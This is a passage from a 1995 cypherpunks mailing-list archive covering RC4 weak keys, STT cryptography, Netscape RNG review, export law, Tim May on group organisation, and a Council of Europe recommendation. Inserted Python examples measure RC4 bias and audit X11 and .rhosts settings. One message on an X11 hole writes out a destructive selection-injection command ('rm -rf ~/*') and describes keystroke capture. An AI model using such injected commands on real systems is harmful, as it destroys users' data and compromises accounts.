> +------------------------------------+---------------------------------+
> | This .sig is SHAREWARE. If you use it often, please send me $50.     |
> | After registering you will receive a fully functional .sig and all   |
> | updates for free.                                                    |
> +----------------------------------------------------------------------+
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 29 Sep 95 09:58:17 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Crypto hardware (was: Using sound cards to accelerate RSA?)
In-Reply-To: <199509290354.XAA21646@frankenstein.piermont.com>
Message-ID: <Pine.SOL.3.91.950929093904.2942A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Sep 1995, Perry E. Metzger wrote:

> world, have real clients, and actually worry about this as a
> problem. This *is* a legitimate problem. Consider what the load on a
> web site using D-H key exchange for every connection gets like when
> you have millions of people hitting it every day.

This is the problem I was concerned about (actually RSA rather than D-H). 
In HTTP-NG, in addition to supporting PK for key exchanges and 
authentications, there is now support that allows most values used in the 
protocol to be signed. Now that non repudiability is becoming legally 
significant, there are all sorts of things that either party might want to 
have signed, for example negotiation options (e.g. wont-log-transactions) 
and meta-information (e.g. kidcode: NC-17,barney-boffing).

More clients and more signings means that conventional chips aren't 
going to be economical for this.

[stuff on hardware]
> 
> The reason the market for this is weird is the same reason Sun took
> the DES chips off its motherboards years ago -- you can't conduct
> modern business with the fucked up export regime we are dealing with.

That's another question. A DSP chip can also be used for crypto - yet 
sound cards and nexts aren't ITARed, and aren't really considered 
dual-use. A Modular exponentiator isn't a crypto device  (hey - 
it's a bignum accelerator for Mathematica). Now, if I had a pipelined 
WSI chip capable of delivering one result per cycle, I could think of 
some useful applications, but ...

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 29 Sep 95 10:09:34 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Hack Microsoft
In-Reply-To: <199509281510.LAA21039@frankenstein.piermont.com>
Message-ID: <Pine.SOL.3.91.950929100423.2942B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Sep 1995, Perry E. Metzger wrote:

> That's almost an invitation to hack Microsoft's web products, isn't it?

Not a real attack- cos it's just a Denial Of Service, but it is kind of 
amusing... 

Windows NT has an interesting property in its handling of TCP connection 
establishment. NT has a small limit on the maximum size of its listen 
queue - it also handles queue overflow in a different way to BSD derived 
stacks. Instead of just dropping the connection request, and allowing the 
client TCP to retry automatically, NT sends a RST packet that aborts the 
connection. 

Ok, you can shutdown just about anything on the Net right now, and there 
won't be a real defence possible until IPSEC starts getting installed, 
but microsoft makes it much too easy. 

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 29 Sep 95 10:16:59 PDT
To: Andrew Roos <AndrewR@beetle.vironix.co.za>
Subject: Re: Cryptanalysis of RC4 - Preliminary Results (Repeat)
Message-ID: <199509291716.KAA06460@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:01 PM 9/29/95 S, Andrew Roos <AndrewR@beetle.vironix.co.za> wrote:
>(This is a repeat because I posted the original 36 hours ago and it still   
>hasn't bounced back to me.)
Hmmm - I got it yesterday, so it did go out.

>The attack is based on two particularly interesting three-byte key
>prefixes which have a high probability of producing PRNG sequences
>which start with a known two-byte sequence. The prefixes are:
>1.  Keys starting with "00 00 FD" which have a 14% probability of
>    generating sequences which start "00 00".
>2.  Keys starting with "03 FD FC" which have a 5% probability of
>    generating sequences which start "FF 03".
[much interesting work deleted]

It sounds like any application using RC4 with random session keys
should start by testing session keys and rejecting any that
start with 00 00 or 03 FD; it means doing 2**-15 more random key
generations, and reducing the brute-force space by 2**-15,
but it's a pretty small reduction.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
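
The key-screening step suggested above, together with a measurement of the two prefix biases Andrew Roos reports, as an added example (not code from either poster). The 16-byte key length, the trial count, the seed and all function names are assumptions made for the illustration.

```python
"""RC4 weak-prefix measurement and session-key screening (added example)."""
import os
import random


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Return the first n keystream bytes RC4 produces for key."""
    # Key-scheduling algorithm: permute S under control of the key.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm.
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def prefix_bias(prefix: bytes, expected: bytes, trials: int = 2000,
                key_len: int = 16, seed: int = 1995) -> float:
    """Fraction of keys starting with prefix whose keystream starts with
    expected. The rest of each key is random (seeded, so runs repeat)."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        tail = bytes(rng.randrange(256) for _ in range(key_len - len(prefix)))
        if rc4_keystream(prefix + tail, len(expected)) == expected:
            hits += 1
    return hits / trials


# The two-byte prefixes the reply proposes to reject: 00 00 and 03 FD.
REJECTED_PREFIXES = (bytes.fromhex("0000"), bytes.fromhex("03fd"))


def is_rejected(key: bytes) -> bool:
    """True if the key starts with one of the screened prefixes."""
    return key.startswith(REJECTED_PREFIXES)


def generate_session_key(key_len: int = 16, rand=os.urandom) -> bytes:
    """Draw random keys until one passes the prefix screen.
    About 2 in 65536 candidates (2**-15) are redrawn."""
    while True:
        key = rand(key_len)
        if not is_rejected(key):
            return key


if __name__ == "__main__":
    print("00 00 FD -> 00 00:", prefix_bias(bytes.fromhex("0000fd"), bytes.fromhex("0000")))
    print("03 FD FC -> FF 03:", prefix_bias(bytes.fromhex("03fdfc"), bytes.fromhex("ff03")))
    print("random   -> 00 00:", prefix_bias(b"", bytes.fromhex("0000")))
    print("session key:", generate_session_key().hex())
```

With these settings the first two rates come out near the quoted 14% and 5%, against a chance rate of 1 in 65536 for an unconstrained key.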





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 29 Sep 95 10:17:42 PDT
To: Jeff Barber <jeffb@sware.com>
Subject: Re: Q&A on the RSA/Cylink legal dispute
Message-ID: <199509291716.KAA06480@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:27 AM 9/29/95 -0400, Jeff Barber <jeffb@sware.com> wrote:
>That's pretty clear to me folks, but make your own judgements.
>>      If you're using RSA's software -you didn't write your own- you don't need
>>      a separate patent license under either the MIT or Stanford patents.
>Again, only to the extent that you're not infringing the Stanford patents.
>
>So, pay your nickel, take your chances.  Does RSA's software infringe
>the Stanford patents?

The RSA algorithm, and thus RSA's software, uses public-key cryptography,
and is therefore within the scope of the claims of the Merkle-Hellman
and/or Hellman-Pohlig patents.  Also, the recent RSAREF versions contain
Diffie-Hellman code, which is covered by the Diffie-Hellman patents (but
PGP doesn't use that version of RSAREF.)

On the other hand, the RSAREF license says that RSA will defend any patent
claims for use of its code (I forget if that was RSADSI or RSA Labs),
and Jim Bidzos confirms that that's still the case even after the PKP breakup.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Sep 95 10:35:41 PDT
To: cypherpunks@toad.com
Subject: "Who shall speak for us?"
Message-ID: <ac916a1a0702100409d8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



The questions "Who are the Cypherpunks?" and  "Who shall speak for us?"
have come up several times, in different contexts:

-- Reporters want "human interest" stories for their other stories on
Netscape cracks, SSL challenges, arrests, executions, etc. They want to
know who we are, what our agenda is, what motivates us, and who our
spokesmen are.

-- "Who shall be our Spokesman?" keeps coming up. "Who shall speak for us?"

-- There is once again talk about "getting organized" so as to better
compete with EPIC, EFF, CPSR, VTW, ACLU, etc. While no one is seriously
advocating a formal, dues-collecting organization, there is an undercurrent
of thought that we had better get more organized or we'll just be roadkill
on the information superduperhighway.

-- And there seems to be a sense of uneasiness amongst some of us that
there can't be a "Cypherpunks group" without organization, without
hierarchy.

In contrast, there have been points made that we are "nothing," not even a
group, and that we are only a set of mailing list subscribers. I think this
is too extreme a view, as we clearly have:

* some sense of membership in a group, some sense of cohesion, some sense
of "Us" vs. "Them."

* regional activities in several parts of the U.S. and in some non-U.S.
countries.

* a growing archive of postings, of knowledge gained through hard work.


So, we are _more_ than just the subscribers to a mailing list, but _less_
than a formal organization with shareholders, voters, elected officials,
and a Great Leader at the top.

What are we, then?

One parallel is to a bunch of folks who meet at a gathering spot, perhaps a
bar or pub. Perhaps a reading group, a book club.  People who talk,
speculate, exchange theories, and even decide on things that some of them
will do. Maybe these folks, an ever-changing set of folks, will come to
some commonly-held viewpoints, though not held by all folks, and not "voted
on" to be the Official Position of this informal gathering of folks at the
local bar.

Cyberspace allows for all sorts of new kinds of "watering holes" where such
emergent, loosely-organized, anarchic groups may develop. These "virtual
communities" are an incredibly important development. (My paper given at
Imagina '95, in Monte Carlo, "Crypto Anarchy and Virtual Communities," goes
into this in detail.)

Another parallel is to what is sometimes called an "invisible college."
Academic researchers in a country or around the world form a loose kind of
invisible college, a network of people at various institutions that share a
common interest and that have certain emergent standards. Think of the
cryptology researchers, or the fusion researchers, of the world. In this
invisible college, reputations matter. Some researchers are more esteemed
than others, some play different roles than others. Some of them are mostly
teachers, others are buried deeply in their laboratories.

And, as with the informal pub gathering, this invisible college does not
have to "vote" on an official position, or "elect" leaders.

Ah, I hear some of you pointing out, "But in fact some of these invisible
colleges _do_ elect officials and _do_ have official positions!" Indeed,
many invisible colleges develop subsets that have formal structures and
become the de facto _professional guilds_ for their organizations. The
American Association of Chiropractic Examiners, the French League of Graph
Paper Experts, the Russian Federation of Agriculturists, and on and on.
(More seriously, the American Bar Association, the American Medical
Association, etc.)

Often these "professional organizations" are designed to extend the reach
of these organizations, to give official titles to the early organizers,
and to lobby governments for laws favorable to their members. Often these
formal organizations adopt licensing rules and regulations to "police
themselves" and also, in well-known cases of "public choice" theory and
"rent-seeking behavior," to limit the number of competitors. Often the
other hierarchies, such as the State itself, endorse the rules adopted by
the professional guilds.

(I'm not saying anyone is directly arguing that the Cypherpunks, not even
by innuendo, become a professional guild, but some of the clamoring about
how we need to adopt a less threatening or strange name, organize ourselves
more hierarchically, and present a more unified front is often a step toward
a rigid bureaucracy.)

It's been gratifying to me, at least, that the Cypherpunks group has not
fallen prey to this temptation, that in an important sense "we practice
what we preach." We claim to be an "anarchy," not a "hierarchy."

While it may be the case that each of us has his or her own personal
hierarchical ratings of others, it is important that we never have tried to
formalize or "vote on" these ratings. Or voted to elect a Great Leader.

Our strength is in our numbers and in our ideas, not in the guy we have
ensconced in an office in Washington so he can give press conferences and
sound bites for journalists. Our strength is in our multi-headed (dare I
mention "Medusa"?), multinational, informal lack of structure.

"But how will _We_ compete with the organizations that have Washington
offices? How will we get "air time" if we have no Spokespunk in Washington,
or no list of Official Spokespunks that journalists can call to get The
Cypherpunks Slant on things? Who shall speak for us?"

The answer is simple: Let no one claim to speak for "us." Let no one claim
to be a speaker for others. Let journalists adjust to a new way of
speaking, a nonhierarchical way of saying "I think" and "My view is." Let
journalists contact the people actually doing something they are writing
about. Let journalists call the people directly involved, not the Official
Spokespunks. It may be _easier_ for some journalists to simply call the guy
they always call, just to get a "reaction quote," but our job is not to
make it easier for some lazy journalists.

And let those who dislike the name "Cypherpunks" call themselves something
else. Nothing's stopping them. Of course, it may be that the people wanting
a more conservative, more staid name also wish to "inherit" the mantle the
Cypherpunks now have, wish to convey to the "International Association of
Cybernetic Privacy Advocates," or whatever, the membership and reputation
of the current and past Cypherpunks. This, I think, is the "old way" of
doing things, the herd way.

If the views many of us have about anarchy and cyberspace are correct, this
way of operating represents the future. If not, who cares what we think?

--Tim May





---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 29 Sep 95 08:18:02 PDT
To: jsw@netscape.com
Subject: Re: netscape NSRANDFILE compatible with /dev/random ?
In-Reply-To: <199509282312.QAA26073@comsec.com>
Message-ID: <9509291514.AA15468@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: "Jeff Weinstein" <jsw@netscape.com>
>Date: Wed, 27 Sep 1995 00:40:41 -0700

>> What happens if NSRANDFILE is set to /dev/random ?
>> will netscape try to read an infinite number of random bytes ?
>
>  In the current patch it will read up to 1 megabyte before stopping.
>In 2.0 I will add a way to specify a size.  As a temporary hack you
>could use 'dd' to get the number of bytes you want into a file, then
>remove the file once netscape had started up.

or you can define a named pipe file (on UNIX at least) which
runs /dev/random through dd.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Fri, 29 Sep 95 09:52:54 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
Message-ID: <9508298123.AA812398949@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     on 9/24/95 karlton@neon.netscape.com (Phil Karlton) at Internet-USA 
     wrote:
     The random number seed generation code is now available for review:
     ftp://ftp1.netscape.com/pub/review/RNGsrc.tar.Z
     
     My platform is DOS 6.22, Windows 3.11
     
     Can someone suggest a program (and where to get it) that will run on 
     my platform and extract the tar.z files into DOS ASCII files so that I 
     can review the key generator code?
     
     Thanks for your help.
     
     Martin G. Diehl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rajaram@morgan.com (P. Rajaram)
Date: Fri, 29 Sep 95 09:02:46 PDT
To: cypherpunks@toad.com
Subject: Traveling abroad with laptops
Message-ID: <9509291202.ZM20738@morgan.com>
MIME-Version: 1.0
Content-Type: text/plain



What would happen if I flew out of the US with a portable
computer that has crypto software (like PGP) installed ?
Assuming that I had no intention of distributing the software
abroad, would I be violating some US export law ?

Matt Blaze (?) had written about his humorous experience
in trying to do the right thing.  It seems that the US Govt.
does not seriously enforce its own export policies.  But
they may start doing so any time.  I am sure that today many
people regularly fly into Europe with crypto software,
without intending to break any laws.

At one point, I had heard that some sort of exception was
planned for export of crypto for personal use.  Does anyone
know if this is real or just a rumor ?

regards

-raj




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 29 Sep 95 12:02:48 PDT
To: hallam@w3.org
Subject: Re: VISA and Microsoft STT Specs available
Message-ID: <199509291902.MAA23808@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:10 AM 9/29/95 -0400, Phill wrote:
>Yes, VISA put the ASCII on their site... 
>We only host the ps version.

Thanks!  I looked at the Visa site, and it has a usable form
of the documents still under construction; I waded through
the 73-separate-page HTML version for a while....
There's some good intro material on how you use the stuff and
who's responsible for what.

Microsoft has the technical specs as one big slightly-HTMLized
text file under http://www.windows.microsoft.com/windows/ie/stt.htm ;
it's _much_ more readable, and has a pointer to the Visa version.
(It's one big <PRE> with a few <B> and hrefs, in black-on-white.)

Some cryptographic high points, from a brief scan.
- 1024-bit RSA signatures, using PKCS#1 format.
- SHA 160-bit hashes
- Symmetric bulk crypto includes two options (I haven't yet seen
  how you choose between them; I assume it's export/domestic?)
  == RC4/64 with 24 bits of salt leaving 40 bits of real key
  == DES-CBC - yes, that's single-DES.  IV=0.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Fri, 29 Sep 95 12:34:44 PDT
To: cypherpunks@toad.com
Subject: STT is 40-bit for RC4, 56-bit for DES
Message-ID: <v03003502ac91f470ee63@[198.93.25.66]>
MIME-Version: 1.0
Content-Type: text/plain


From the STT spec, page 73:

6.8 CRYPTOGRAPHY

A. Encryption

Two bulk encryption algorithms are used in STT - RC4 and DES.

1. STT uses RC4 encryption with 8-byte keys, of which 3 bytes are salt,
in the clear. See the RC4Key entry under the Low Level Composites
sub-section of this document. RC4 is a stream cipher; there are no pad
bytes and the encrypted data is the same size as the plaintext data.

2. STT uses the Cipher Block Chaining (CBC) mode of DES, as defined in
Federal Information Processing Standard FIPS 81. The key is 8 bytes
long, with each byte having a parity bit in position 0. Thus there are
56 bits of random key. STT uses an all-zero byte Initialization Vector
(IV). A maximum of 8 bytes of padding is applied to every plaintext
message encrypted with DES to pad the message to a length that is a
multiple of 8 bytes. Pad bytes have a value of

      x = 8 - ((length of the plaintext) mod 8)

and the number of pad bytes is also x. For example, if the plaintext
message was 17 bytes long, then each of the 7 bytes of padding contains
the value 0x07. If x is 0, then there are 8 bytes, each containing
0x08. Padding is appended to the end of the plaintext before encryption
and is stripped off after decryption.

B. Signatures

STT uses PKCS #1 Encryption block formatting for RSA signatures. Total
length is 128 bytes for the signature (1024-bit modulus). The following
is the plaintext:

(TLV_SIGNATURE
    (BYTE[20] HashOfData)    ;Hash of the data being signed
    (BYTE 0)                 ;parser initializer
    (BYTE[105] 0xff)         ;padding
    (BYTE 0x01)              ;recom. for private key encryptions
    (BYTE 0))                ;overflow protection for RSA

C. Hashing

All hashes in STT are 20-byte SHA hashes. See Federal Information
Processing Standards FIPS 181 for the specification of SHA hashes.

________________________________________________________________________
Stephan Somogyi                Mr Gyroscope                Digital Media
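
The DES padding rule and the signature plaintext layout quoted above, written out as an added example (not code from the STT spec or from the poster). The function names are assumptions, hashlib's SHA-1 stands in for the spec's "20-byte SHA", and the fields are laid out in the order the listing gives them.

```python
"""STT block padding and signature plaintext layout (added example)."""
import hashlib
import hmac

BLOCK = 8        # DES block size in bytes
SIG_LEN = 128    # 1024-bit RSA modulus
HASH_LEN = 20
FF_LEN = 105


def stt_pad(plaintext: bytes) -> bytes:
    """Append x bytes of value x, x = 8 - (len mod 8), so 1 <= x <= 8.
    A plaintext already on a block boundary gains a full block of 0x08."""
    x = BLOCK - (len(plaintext) % BLOCK)
    return plaintext + bytes([x]) * x


def stt_unpad(padded: bytes) -> bytes:
    """Strip the padding after decryption, rejecting anything malformed."""
    if not padded or len(padded) % BLOCK:
        raise ValueError("length is not a positive multiple of 8")
    x = padded[-1]
    if not 1 <= x <= BLOCK or padded[-x:] != bytes([x]) * x:
        raise ValueError("malformed padding")
    return padded[:-x]


def build_signature_plaintext(data: bytes) -> bytes:
    """Lay out the 128-byte block that is fed to the RSA private key."""
    digest = hashlib.sha1(data).digest()      # assumption: SHA-1 as "SHA"
    block = (digest                           # BYTE[20] HashOfData
             + b"\x00"                        # BYTE 0, parser initializer
             + b"\xff" * FF_LEN               # BYTE[105] 0xff, padding
             + b"\x01"                        # BYTE 0x01
             + b"\x00")                       # BYTE 0, overflow protection
    if len(block) != SIG_LEN:
        raise AssertionError("layout does not add up to 128 bytes")
    return block


def parse_signature_plaintext(block: bytes) -> bytes:
    """Check every fixed byte of a recovered block and return the hash."""
    if len(block) != SIG_LEN:
        raise ValueError("signature plaintext must be 128 bytes")
    fixed = block[HASH_LEN:]
    expected = b"\x00" + b"\xff" * FF_LEN + b"\x01" + b"\x00"
    # Compare the whole fixed region, not just its first and last bytes,
    # so no attacker-chosen bytes can hide inside the padding.
    if not hmac.compare_digest(fixed, expected):
        raise ValueError("fixed bytes do not match the layout")
    return block[:HASH_LEN]


def signature_covers(block: bytes, data: bytes) -> bool:
    """True if the recovered block is well formed and hashes to data."""
    try:
        digest = parse_signature_plaintext(block)
    except ValueError:
        return False
    return hmac.compare_digest(digest, hashlib.sha1(data).digest())


if __name__ == "__main__":
    print(stt_pad(b"A" * 17).hex())
    print(build_signature_plaintext(b"constructed sample order").hex())
```

DES-CBC itself is left out because the Python standard library has no DES; the RSA operation is likewise out of scope here.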






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Fri, 29 Sep 95 09:42:39 PDT
To: Jyri Kaljundi <jk@digit.ee>
Subject: Re: Netscape hole without .Xauthority (fwd)
In-Reply-To: <Pine.3.89.9509291503.A1295-0100000@jamarillo>
Message-ID: <MAA03656.199509291639@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <Pine.3.89.9509291503.A1295-0100000@jamarillo>, Jyri Kaljundi writes:
[...]
>There's a huge hole in the Netscape remote control mechanism for the
>X-Windows based clients.
>Potential impact : anybody can become any user that uses Netscape on any
>system without sufficient X security.
[...]
>PS: WHY do they bother with PGP and RSA security when they keep such holes ????

Well, I would suspect that because if your X server isn't "secure" there
isn't much you can do that is.

Other than xterm, most X programs will respond to "synthetic" events
(events generated by another program as opposed to the user), this
means with a little work anyone with access to the X server could
click open the File menu, select "Open URL", type in a URL, press "Open",
click "SaveAs", and so on.

Even if all X clients stopped listening to synthetic events (which would
be a shame - since they are useful in various contexts) X's event
structure allows multiple X clients to listen for the same events on
the same windows, so a simple program could track all keystrokes and
capture your passwords.

Failing all of that any X client could track ownership of the X selection
(the "cut buffer" normally used to hold text), and when it looks like a
Unix command (implying that you will be pasting it into the command line)
assert ownership of the selection itself and put in "^X^U^H;rm -rf ~/*"
followed by a carriage return.

That's just off the top of my head ('tho I admit I have written two of
the three "exploits" while I was a sysadmin 4 years ago in an effort
to convince my managers to mandate better security than "xhost +"...).

So saying "Netscape isn't secure when my X server isn't" is a lot like
saying "When I leave the front door of my house unlocked my VCR isn't
safe!".
-- 
Not speaking for my employer, or anyone other than myself.
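
A defender's audit for the conditions this thread turns on (an X display open through xhost, a missing .Xauthority, and a .rhosts containing "+" wildcards), as an added example that is not code from any poster. The function names and the sample inputs are constructed for the illustration; the xhost status lines are the ones the standard xhost client prints.

```python
"""Audit xhost output, .Xauthority and .rhosts for open access (added example)."""
from pathlib import Path


def audit_xhost(output: str) -> list:
    """Flag an open display in the text printed by a bare `xhost` call."""
    findings = []
    for line in (l.strip() for l in output.splitlines()):
        if not line or line.startswith("access control enabled"):
            continue
        if line.startswith("access control disabled"):
            findings.append("xhost: access control disabled, any host may connect")
        elif not line.lower().startswith("si:localuser:"):
            # A host entry admits every account on that host, which is the
            # shared-machine case the forwarded advisory describes.
            findings.append(f"xhost: host-based grant {line!r} covers all users there")
    return findings


def audit_rhosts(text: str) -> list:
    """Flag wildcard entries in the contents of a .rhosts file."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        fields = raw.split()
        if not fields or fields[0].startswith("#"):
            continue
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        if host == "+" and user == "+":
            findings.append(f".rhosts:{lineno}: '+ +' trusts any user from any host")
        elif host == "+":
            findings.append(f".rhosts:{lineno}: '+' host field trusts every host")
        elif user == "+":
            findings.append(f".rhosts:{lineno}: '+' user field trusts every user on {host}")
    return findings


def audit_home(home: Path) -> list:
    """Check one home directory for the preconditions discussed above."""
    findings = []
    xauth = home / ".Xauthority"
    if not xauth.is_file() or xauth.stat().st_size == 0:
        findings.append(".Xauthority missing or empty: no cookie protects the display")
    elif xauth.stat().st_mode & 0o077:
        findings.append(".Xauthority is accessible to group or others")
    rhosts = home / ".rhosts"
    if rhosts.is_file():
        findings += audit_rhosts(rhosts.read_text(errors="replace"))
    return findings


# Constructed sample inputs, not captured from a real system.
SAMPLE_XHOST_OPEN = "access control disabled, clients can connect from any host\n"
SAMPLE_XHOST_HOSTS = ("access control enabled, only authorized clients can connect\n"
                      "INET:lab12.example.edu\nSI:localuser:alice\n")
SAMPLE_RHOSTS = "# constructed sample\ntrusted.example.edu alice\n+ +\n"

if __name__ == "__main__":
    for finding in (audit_xhost(SAMPLE_XHOST_OPEN) + audit_xhost(SAMPLE_XHOST_HOSTS)
                    + audit_rhosts(SAMPLE_RHOSTS) + audit_home(Path.home())):
        print(finding)
```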




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Fri, 29 Sep 95 09:49:27 PDT
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: COE Document
Message-ID: <n1399743612.14225@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


------------------------------------------------------------------------

A HTML Version of this document is available at the Privacy International 
Archives at www.privacy.org/pi/intl_orgs/coe/info_tech_1995.html


                       Recommendation No. R (95) 13

               of the Committee of Ministers to Member States

                Concerning Problems of Criminal Procedure Law
                    Connected with Information Technology

       (Adopted by the Committee of Ministers on 11 September 1995
                at the 543 meeting of the Ministers' Deputies)

	The Committee of Ministers, under the terms of Article 15.b of the
Statute of the Council of Europe.

	Considering that the aim of the Council of Europe is to achieve a
greater unity between its members;

	Having regard to the unprecedented development of information
technology and its application in all sectors of modern society;

	Realizing that the development of electronic information systems
will speed up the transformation of traditional society into an
information society by creating a new space for all types of
communications and relations;

	Aware of the impact of information technology on the manner in
which society is organised and on how individuals communicate and
interrelate;

	Conscious that an increasing part of economic and social relations
will take place through or by use of electronic information systems;

	Concerned at the risk that electronic information systems and
electronic information may also be used for committing criminal offenses;

	Considering that evidence of criminal offenses may be stored and
transferred by these systems;

	Noting that criminal procedure laws of member states often do not
yet provide for appropriate powers to search and collect evidence in these
systems in the course of criminal investigations;

	Recalling that the lack of appropriate special powers may impair
investigating authorities in the proper fulfilment of their tasks in the
face of the ongoing development of information technology;

	Recognising the need to adopt the legitimate tools which
investigating authorities are afforded under criminal procedure laws the
the specific nature of investigations in electronic information systems;

	Concerned by the potential risk that member states may not be able
to render mutual legal assistance in an appropriate way when requested to
collect electronic evidence within their territory from electronic
information systems;

	Convinced of the necessity of strengthening international
co-operation and achieving a greater compatibility of criminal procedural
laws in this field;

	Recalling Recommendation No. R (81) 20 of the Committee of
Ministers on the harmonisation of laws relating to the requirement of
written proof and to the admissibility of reproductions of documents and
recordings on computers, Recommendation No. R. (85) 10 on letters rogatory
for the interception of telecommunications, Recommendations No. R (87) 15
regulating the use of personal data in the police state and
Recommendations No. R (89) 9 on computer-relating crime,

	Recommends the governments of member states:

i.	when reviewing their internal legislation and practice, to be
guided by the principles appended to this recommendation; and

ii.	to ensure publicity for these principles among those investigating
authorities and other professional bodies, in particular in the field of
information technology, which may have an interest in their application.

 
                Appendix to Recommendation No R. (95) 13

               concerning problems of criminal procedure law
                   connected with information technology

I. Search and seizure 
-----------------------------

1. The legal distinction between searching computer systems and seizing
data stored therein and intercepting data in the course of transmission
should be clearly delineated and applied.

2. Criminal procedure laws should permit investigating authorities to
search computer systems and seize data under similar conditions as under
traditional powers of search and seizure. The person in charge of the
system should be informed that the system has been searched and of the
kind of data that has been seized. The legal remedies that are provided
for in general against search and seizure should be equally applicable in
case of search in computer systems and in case of seizure of data therein.

3. During execution of a search, investigating authorities should have the
power, subject to appropriate safeguards, to extend the search of other
computer systems within their jurisdiction which are connected by means of
a network and seize the data therein, provided immediate action is
required.

4. Where automatically processed data is functionally equivalent to a
traditional document, provisions in the criminal procedure law relating to
search and seizure of documents should apply equally to it.

II. Technical Surveillance 
-------------------------------------

5. In view of the convergence of information technology and
telecommunications, law pertaining to technical surveillance for the
purpose of criminal investigations, such as interception of
telecommunications, should be reviewed and amended, where necessary, to
ensure their applicability.

6. The law should permit investigating authorities to avail themselves of
all necessary technical measures that enable the collection of traffic
data in the investigation of crimes.

7. When collected in the course of a criminal investigation and in
particular when obtained by means of intercepting telecommunications, data
which is the object of legal protection and processed by a computer system
should be secured in an appropriate manner.

8. Criminal procedure laws should be reviewed with a view to making
possible the interception of telecommunications and the collection of
traffic data in the investigation of serious offenses against the
confidentiality, integrity and availability of telecommunications or
computer systems.


III. Obligations to co-operate with the investigating authorities
--------------------------------------------------------------------

9. Subject to legal privileges or protection, most legal systems permit
investigating authorities to order persons to hand over objects under
their control that are required to serve as evidence. In a parallel
fashion, provisions should be made for the power to order persons to
submit any specified data under their control in a computer system in the
form required by the investigating authority.

10. Subject to legal privileges or protection, investigating authorities
should have the power to order persons who have data in a computer system
under their control to provide all necessary information to enable access
to a computer system and the data therein. Criminal procedure law should
ensure that a similar order can be given to other persons who have
knowledge about the functioning of the computer system or measures applied
to secure the data therein.

11. Specific obligations should be imposed on operators of public and
private networks that offer telecommunications services to the public to
avail themselves of all necessary technical measures that enable the
interception of telecommunications by the investigating authorities.

12. Specific obligations should be imposed on service providers who offer
telecommunications services to the public, either through public or
private networks, to provide information to identify the user, when so
ordered by the competent investigating authority.


IV. Electronic Evidence 
------------------------

13. The common need to collect, preserve, and present electronic evidence
in ways that best ensure and reflect their integrity and irrefutable
authenticity, both for the purposes of domestic prosecution and
international co-operation, should be recognized. Therefore, procedures
and technical methods for handling electronic evidence should be further
developed, and particularly in such a way as to ensure their compatibility
between states. Criminal procedural law provisions on evidence relating to
traditional documents should similarly apply to data stored in a computer
system.


V. Use of Encryption 
---------------------

14. Measures should be considered to minimise the negative effects of the
use of cryptography on the investigation of criminal offenses, without
affecting its legitimate use more than is strictly necessary.


VI. Research, statistics and training
-------------------------------------

